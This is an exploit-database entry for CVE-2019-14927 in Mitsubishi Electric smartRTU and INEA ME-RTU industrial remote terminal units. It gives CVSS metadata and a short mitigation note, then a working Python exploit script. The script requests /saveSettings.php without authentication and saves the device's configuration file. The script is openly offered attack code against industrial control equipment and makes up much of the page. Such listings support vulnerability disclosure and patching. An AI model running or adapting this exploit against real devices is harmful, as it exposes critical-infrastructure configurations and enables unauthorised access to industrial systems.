Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download

vendor:

smartRTU

by:

@xerubus

7.5

CVSS

HIGH

Unauthenticated Configuration Download

287

CWE

Product Name: smartRTU

Affected Version From: Misubishi Electric 2.02 & INEA 3.0

Affected Version To: Misubishi Electric 2.02 & INEA 3.0

Patch Exists: YES

Related CWE: CVE-2019-14927

CPE: h:mitsubishi_electric:smartrtu

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2019

Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download

This exploit allows an attacker to download the configuration file of a Mitsubishi Electric smartRTU or INEA ME-RTU without authentication. The exploit is triggered by sending a GET request to the saveSettings.php page of the device, which will return the configuration file in XML format.

Mitigation:

Ensure that the device is not accessible from the public internet and that authentication is required to access the configuration file.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download
# Date: 29 June 2019 
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
# CVE-ID: CVE-2019-14927
# Full write-up: https://www.mogozobo.com/?p=3593

import sys, os, requests, socket

os.system('clear')

print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= Conf_Me-smartRTU  by @xerubus =-    
|   D _]/\ \  -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)

host = raw_input("Enter RTU IP address: ")
	
php_page = '/saveSettings.php'
url = "http://{}{}".format(host, php_page)

print "[+] Attempting to download smartRTU configuration file"

r = requests.get(url)
if r.status_code == 200:
   print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
   with open('smartRTU_conf.xml', 'w') as f:
      f.write(r.content)